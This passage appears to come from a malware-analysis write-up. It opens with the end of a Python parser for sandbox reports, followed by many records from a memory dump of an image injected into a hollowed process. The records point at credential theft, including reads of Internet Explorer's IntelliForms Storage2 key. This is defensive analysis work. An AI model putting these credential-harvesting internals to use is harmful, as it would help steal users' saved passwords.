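            rec["apis"].append(parse_api(line))
        elif section == "Strings" and XREF_RE.match(line):
            m = XREF_RE.match(line)
            rec["strings"].append((m["text"], int(m["ref"], 16)))
        elif section == "Memory Dump Source" and line.startswith("Source File: "):
            rec["source"] = line[len("Source File: "):].split(",")[0]
        elif section in ("Similarity", "Uniqueness"):
            key, _, val = line.partition(":")
            rec["meta"][key.strip()] = val.strip()
    return records


def module_histogram(records):
    """Count direct (non-subcall) API references per DLL across records."""
    return Counter(a["module"] for r in records for a in r["apis"]
                   if a["parent"] is None)


def embeds_sqlite(records):
    seen = {s for r in records for s, _ in r["strings"]}
    return all(marker in seen for marker in SQLITE_MARKERS)


# Two records copied from this report (FormatMessageW helper, SQLite ATTACH).
SAMPLE = """
APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5,00000000,?,0040FF40,00000000), ref: 00407D1B
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5), ref: 00407D39
• wcslen.MSVCRT ref: 00407D46
• wcscpy.MSVCRT ref: 00407D56
• LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5,00000000), ref: 00407D60
• wcscpy.MSVCRT ref: 00407D70
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API String ID: 2767993716-572158859
APIs
Strings
• database is already attached, xrefs: 0042EF94
• unable to open database: %s, xrefs: 0042F0C1
• cannot ATTACH database within transaction, xrefs: 0042EED9
• out of memory, xrefs: 0042F0D8
• attached databases must use the same text encoding as main database, xrefs: 0042EFE2
• too many attached databases - max %d, xrefs: 0042EEC3
• database %s is already in use, xrefs: 0042EF3B
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records", dict(module_histogram(recs)),
          "sqlite:", embeds_sqlite(recs), parse_sdmp_name(recs[0]["source"]))
```

Feed it the whole report text rather than the excerpt and `module_histogram` shows at a glance which DLLs the injected image leans on, while `embeds_sqlite` and the dump-name decoding confirm, without opening a debugger, that an RWX image at 0x400000 in the hollowed process carries its own database engine.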
APIs
  • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C127
  • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C135
  • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C146
  • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C15D
  • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C166
• ??2@YAPAXI@Z.MSVCRT ref: 0040C37A
• ??2@YAPAXI@Z.MSVCRT ref: 0040C396
• memcpy.MSVCRT ref: 0040C3BB
• memcpy.MSVCRT ref: 0040C3CF
• ??2@YAPAXI@Z.MSVCRT ref: 0040C452
• ??2@YAPAXI@Z.MSVCRT ref: 0040C45C
• ??2@YAPAXI@Z.MSVCRT ref: 0040C494
  • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
  • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
  • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
  • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
  • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
  • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
• String ID: 8"E$d
• API String ID: 1140211610-2418960419
• Opcode ID: 630083eee7cbf1c10867c7b3dfcb71eb0ae95e41edb8436bedb91c8cd5998a80
• Instruction ID: ebdbfbf94f53a3690cf38ac0907b9363cbed6c4ceb444703d02dc3853126dfb0
• Opcode Fuzzy Hash: 630083eee7cbf1c10867c7b3dfcb71eb0ae95e41edb8436bedb91c8cd5998a80
• Instruction Fuzzy Hash: 3851AE726007049FD724DF29C586B5AB7E4FF48314F10862EE95ADB391DB78E5408B48
Uniqueness
Uniqueness Score: -1.00%

APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004171FA
• Sleep.KERNEL32(00000001), ref: 00417204
• GetLastError.KERNEL32 ref: 00417216
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004172EE
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: File$ErrorLastLockSleepUnlock
• String ID:
• API String ID: 3015003838-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,004536AC,00417555,00000000,?,00000000,00000000), ref: 00417E63
• GetFileAttributesW.KERNEL32(00000000), ref: 00417E6A
• GetLastError.KERNEL32 ref: 00417E77
• Sleep.KERNEL32(00000064), ref: 00417E8C
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,004536AC,00417555,00000000,?,00000000,00000000), ref: 00417E95
• GetFileAttributesA.KERNEL32(00000000), ref: 00417E9C
• GetLastError.KERNEL32 ref: 00417EA9
• Sleep.KERNEL32(00000064), ref: 00417EBE
• free.MSVCRT(00000000), ref: 00417EC7
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: File$AttributesDeleteErrorLastSleep$free
• String ID:
• API String ID: 2802642348-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memcpy
• String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
• API String ID: 3510742995-3273207271
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00408D9F: free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
  • Part of subcall function 00408D9F: free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA
  • Part of subcall function 00413E4F: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62
  • Part of subcall function 00408EE8: free.MSVCRT(?,00000000,?,0040923F,00000000,?,00000000), ref: 00408EF7
• memset.MSVCRT ref: 0040A5DF
• RegEnumValueW.ADVAPI32 ref: 0040A60D
• _wcsupr.MSVCRT ref: 0040A627
  • Part of subcall function 00408DC5: wcslen.MSVCRT ref: 00408DD7
  • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
  • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
  • Part of subcall function 00408DC5: memcpy.MSVCRT ref: 00408E44
• memset.MSVCRT ref: 0040A676
• RegEnumValueW.ADVAPI32 ref: 0040A6A1
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040A6AE
Strings
• Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A58C
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
• String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
• API String ID: 4131475296-680441574
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
• wcscpy.MSVCRT ref: 0040B382
  • Part of subcall function 0040B7F3: memset.MSVCRT ref: 0040B806
  • Part of subcall function 0040B7F3: _itow.MSVCRT ref: 0040B814
• wcslen.MSVCRT ref: 0040B3A0
• GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
• LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
• memcpy.MSVCRT ref: 0040B419
  • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B299
  • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2B7
  • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2D5
  • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2F3
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
• String ID: sysdatetimepick32
• API String ID: 1028950076-4169760276
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32 ref: 00405153
• GetDlgItem.USER32 ref: 00405166
• GetDlgItem.USER32 ref: 0040517B
• GetDlgItem.USER32 ref: 00405193
• EndDialog.USER32(?,00000002), ref: 004051AF
• EndDialog.USER32(?,00000001), ref: 004051C4
  • Part of subcall function 00404E6E: GetDlgItem.USER32 ref: 00404E7B
  • Part of subcall function 00404E6E: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404E90
• SendDlgItemMessageW.USER32 ref: 004051DC
• SetDlgItemInt.USER32 ref: 004052ED
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Item$Dialog$MessageSend
• String ID:
• API String ID: 3975816621-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• _wcsicmp.MSVCRT ref: 00443F6F
• _wcsicmp.MSVCRT ref: 00443F84
• _wcsicmp.MSVCRT ref: 00443F99
  • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EBE
  • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EC8
  • Part of subcall function 00407EAF: _memicmp.MSVCRT ref: 00407EE3
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: _wcsicmp$wcslen$_memicmp
• String ID: .save$http://$https://$log profile$signIn
• API String ID: 1214746602-2708368587
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ??2@$??3@$FocusInvalidateRectmemset
• String ID:
• API String ID: 2313361498-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32 ref: 00405491
• GetWindow.USER32(?,00000005), ref: 004054A9
• GetWindow.USER32(00000000), ref: 004054AC
  • Part of subcall function 00401735: GetWindowRect.USER32 ref: 00401744
• GetWindow.USER32(00000000,00000002), ref: 004054B8
• GetDlgItem.USER32 ref: 004054CE
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040550D
• GetDlgItem.USER32 ref: 00405517
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405566
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Window$ItemMessageRectSend$Client
• String ID:
• API String ID: 2047574939-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32(?,?,0040F25C,-00000210), ref: 00407F3A
• wcslen.MSVCRT ref: 00407F47
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,0040F25C,-00000210), ref: 00407F57
• GlobalLock.KERNEL32 ref: 00407F64
• memcpy.MSVCRT ref: 00407F6D
• GlobalUnlock.KERNEL32(00000000), ref: 00407F76
• SetClipboardData.USER32 ref: 00407F7F
• CloseClipboard.USER32(?,?,0040F25C,-00000210), ref: 00407F8F
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
• String ID:
• API String ID: 1213725291-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00406FF4
• memset.MSVCRT ref: 00407008
• strcpy.MSVCRT(?,?,?,00407919,?,?,?,?,?,?,?,?,?), ref: 00407022
• strcpy.MSVCRT(?,?,?,?,?,?,?,00407919,?,?,?,?,?,?,?,?), ref: 00407067
• strcpy.MSVCRT(?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?,?,?), ref: 0040707B
• strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?), ref: 0040708E
• wcscpy.MSVCRT ref: 0040709D
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070C3
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070DD
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: strcpy$ByteCharMultiWidememset$wcscpy
• String ID:
• API String ID: 4248099071-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32 ref: 00404F51
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00404F6A
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00404F77
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404F83
• memset.MSVCRT ref: 00404FE7
• SendMessageW.USER32(?,0000105F,?,?), ref: 0040501C
• SetFocus.USER32(?), ref: 004050A2
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: _snwprintfwcscat
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 384018552-4153097237
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ItemMenu$CountInfomemsetwcschr
• String ID: 0$6
• API String ID: 2029023288-3849865405
                                                                                                                                                                  • Opcode ID: 00042f4cecb0564cffffbf5123c116da2299592ae5eb2f27c9d7456f419c59bb
                                                                                                                                                                  • Instruction ID: 3c4375d2aaca836e1f5ba8730f1b4cbf28b1f601c5efe325adce4426e162c3cb
                                                                                                                                                                  • Opcode Fuzzy Hash: 00042f4cecb0564cffffbf5123c116da2299592ae5eb2f27c9d7456f419c59bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A218B72605340ABD710DF55D845A9BB7E8FB89B54F00063FF644A2291E77ADA00CBDE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00408716
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 00408742
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 00408757
• wcscpy.MSVCRT ref: 00408767
• wcscat.MSVCRT ref: 00408774
• wcscat.MSVCRT ref: 00408783
• wcscpy.MSVCRT ref: 00408795
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
• API String ID: 1331804452-0
• Opcode ID: faaca5197708b47c47af442705d4c9df3f3a62e632b81e41ea1eb2464032714f
• Instruction ID: e89223cf66055297cb9dadcb336121efaa359588445afa49c1b13fad1ad85cab
• Opcode Fuzzy Hash: faaca5197708b47c47af442705d4c9df3f3a62e632b81e41ea1eb2464032714f
• Instruction Fuzzy Hash: 3D1160B280011CBBEF11AF94DD45EEB7BBCEB41744F10407BBA04A6091D6389E448B79
Uniqueness
• Uniqueness Score: -1.00%

Strings
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040D8BF
• <%s>, xrefs: 0040D8E2
• <?xml version="1.0" ?>, xrefs: 0040D8B8
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memset$_snwprintf
• String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3473751417-2880344631
• Opcode ID: 6c1110d14c1add4ef8e68146380b3aae4225835160ec4e19b547157684646b60
• Instruction ID: 334aba75e86a29cb8f13e765f22732fbee0fc66aecb0188c901082e5a368eb6e
• Opcode Fuzzy Hash: 6c1110d14c1add4ef8e68146380b3aae4225835160ec4e19b547157684646b60
• Instruction Fuzzy Hash: 6C01DFB2A402197BE710A759CC41FAA776DEF44744F1440B7B60CF3141D7389E458799
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: wcscat$_snwprintfmemset
• String ID: %2.2X
• API String ID: 2521778956-791839006
• Opcode ID: 5a064a07adf84ed7b2831601ac1f3950ee49257a2339621e3ef87230185a7937
• Instruction ID: 7e3155c1ee39ddc5e1c88fc61abef366a99ea1f709d40badb718d03975286e65
• Opcode Fuzzy Hash: 5a064a07adf84ed7b2831601ac1f3950ee49257a2339621e3ef87230185a7937
• Instruction Fuzzy Hash: 8F012873D4031866F734E7519C46BBA33A8AB81B18F11403FFC54B51C2EA7CDA4446D8
Uniqueness
• Uniqueness Score: -1.00%

APIs
• wcscpy.MSVCRT ref: 00443CA6
• wcscat.MSVCRT ref: 00443CB5
• wcscat.MSVCRT ref: 00443CC6
• wcscat.MSVCRT ref: 00443CD5
• VerQueryValueW.VERSION(?,?,00000000,?), ref: 00443CEF
  • Part of subcall function 0040807E: wcslen.MSVCRT ref: 00408085
  • Part of subcall function 0040807E: memcpy.MSVCRT ref: 0040809B
  • Part of subcall function 00408148: lstrcpyW.KERNEL32 ref: 0040815D
  • Part of subcall function 00408148: lstrlenW.KERNEL32(?), ref: 00408164
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
• String ID: \StringFileInfo\
• API String ID: 393120378-2245444037
• Opcode ID: 9500244735cad2a77f643a6d996c161e8bec2251a1074d797bccc37d017a6394
• Instruction ID: 4bcd922806ee50f9cb47b7d9b2cc513868d30f54de93413914084f8cb2eb3ca3
• Opcode Fuzzy Hash: 9500244735cad2a77f643a6d996c161e8bec2251a1074d797bccc37d017a6394
• Instruction Fuzzy Hash: B801847290020DA6EF11EAA1CC45EDF777CAB44308F1005B7B654F2052EA3CDB869B58
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _snwprintfwcscpy
• String ID: dialog_%d$general$menu_%d$strings
• API String ID: 999028693-502967061
• Opcode ID: 167585e561b408c48eaedfed01294a32f4914c684c08b453e3d5971788cf8a7a
• Instruction ID: fa5e8ebf88800a0e12fd117f624f479e56397311d80730f797776366f89ad5f2
• Opcode Fuzzy Hash: 167585e561b408c48eaedfed01294a32f4914c684c08b453e3d5971788cf8a7a
• Instruction Fuzzy Hash: 9FE086717C830031FE1115511E83F162150C6E5F95FB1046BF505B16D2DB7D8864668F
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memset
• String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-1606337402
• Opcode ID: 8c8ae128e2328f7302dbfa3f65ab71e8e651d3896b870492eb27771cacaf7654
• Instruction ID: c7fea52ce07df1abaedfaf21b9d509cbcb108d5d19e9a81960d934b60e9c5d67
• Opcode Fuzzy Hash: 8c8ae128e2328f7302dbfa3f65ab71e8e651d3896b870492eb27771cacaf7654
• Instruction Fuzzy Hash: 6A818D70A083219FDB10DF15E48161BB7E0AF94324F59885FEC859B252D378EC95CB9B
Uniqueness
• Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004115CD,00000000,00000000), ref: 00413152
• memset.MSVCRT ref: 004131B4
• memset.MSVCRT ref: 004131C4
  • Part of subcall function 00413031: wcscpy.MSVCRT ref: 0041305A
• memset.MSVCRT ref: 004132AF
• wcscpy.MSVCRT ref: 004132D0
• CloseHandle.KERNEL32(?,004115CD,?,?,?,004115CD,00000000,00000000), ref: 00413326
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memset$wcscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3300951397-0
• Opcode ID: f89de95a6920a90433c065a9965a4fcf749ac6404f68e573733b6ce647e0e13f
• Instruction ID: cefdbdf849389f09311ea621c5a87f262da3bfb792e558c61850347b92c9bf04
• Opcode Fuzzy Hash: f89de95a6920a90433c065a9965a4fcf749ac6404f68e573733b6ce647e0e13f
• Instruction Fuzzy Hash: 0D514971108344AFD720DF65CC88A9BB7E8FB84306F404A2EF99982251DB74DA44CB6A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00417F17
• GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00417F25
• free.MSVCRT(00000000), ref: 00417F6B
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0
• Opcode ID: 589a6b9333c77986f3b6355c6ce351534fc2f1959dd785c0c1c88223f13a717d
• Instruction ID: b8dc40b53dc963fdbe0ae3b1e60dcad109612476599bdcfb1117a2ceff08efc0
• Opcode Fuzzy Hash: 589a6b9333c77986f3b6355c6ce351534fc2f1959dd785c0c1c88223f13a717d
• Instruction Fuzzy Hash: 0811B73690C1159B9B109F649CC15EF7278DB49354B21013BF912A2281D63C9D82D2AD
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040EF4D
                                                                                                                                                                    • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                    • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                    • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                    • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                    • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                    • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                    • Part of subcall function 00408AE8: memset.MSVCRT ref: 00408B09
                                                                                                                                                                    • Part of subcall function 00408AE8: _snwprintf.MSVCRT ref: 00408B3C
                                                                                                                                                                    • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B48
                                                                                                                                                                    • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B60
                                                                                                                                                                    • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B6E
                                                                                                                                                                    • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B81
                                                                                                                                                                    • Part of subcall function 00408907: GetSaveFileNameW.COMDLG32(?), ref: 00408956
                                                                                                                                                                    • Part of subcall function 00408907: wcscpy.MSVCRT ref: 0040896D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                  • API String ID: 1392923015-3614832568
                                                                                                                                                                  • Opcode ID: e098a2b6de55531eea522cb88dcf061458ab68b85293c38f111b81194adb8019
                                                                                                                                                                  • Instruction ID: 893d8713e26b77edc4206c052df4fc7d3163be0104e9675467069f1f0f0c5c5e
                                                                                                                                                                  • Opcode Fuzzy Hash: e098a2b6de55531eea522cb88dcf061458ab68b85293c38f111b81194adb8019
                                                                                                                                                                  • Instruction Fuzzy Hash: 963150B1D006199FDB10EF96D8856DD7BB4FF04318F20417BF908B7281EB786A458B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 00416E17
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00416E35
                                                                                                                                                                  • malloc.MSVCRT ref: 00416E3F
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00416E56
                                                                                                                                                                  • free.MSVCRT(?), ref: 00416E5F
                                                                                                                                                                  • free.MSVCRT(?,?), ref: 00416E7D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4131324427-0
                                                                                                                                                                  • Opcode ID: ef1d8c4a491119e611ed89199fe48a787826ffdbe5a65be19b588c9cf178c72a
                                                                                                                                                                  • Instruction ID: 8f18c9831eb1c79f14fd8e789aed1b74bdecd3d50ffb4352c5f07f5f59d31971
                                                                                                                                                                  • Opcode Fuzzy Hash: ef1d8c4a491119e611ed89199fe48a787826ffdbe5a65be19b588c9cf178c72a
                                                                                                                                                                  • Instruction Fuzzy Hash: 4901FC7A504221BBAB215B75EC01EEF36DCDF457B07220326FC14E7290DA28DD4145EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                  • String ID: NA$LMA$MMA$MMA
                                                                                                                                                                  • API String ID: 3510742995-965156261
                                                                                                                                                                  • Opcode ID: 55ac8c502bd4826d858cd5ef6fc5d691ccd3d3d57d4c1cb0b8c1e43a78ebe62b
                                                                                                                                                                  • Instruction ID: 8582fd1753a63c193c8d59700b7b4d4e45a0e47666d49b47a36a18adf3e061cc
                                                                                                                                                                  • Opcode Fuzzy Hash: 55ac8c502bd4826d858cd5ef6fc5d691ccd3d3d57d4c1cb0b8c1e43a78ebe62b
                                                                                                                                                                  • Instruction Fuzzy Hash: DBE09A30940350DAE360A744DC82F823294A742B26F11843BE508229E3C3FC98C88BAD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?,?,0041767E), ref: 00417AF6
                                                                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?,?,0041767E), ref: 00417B1E
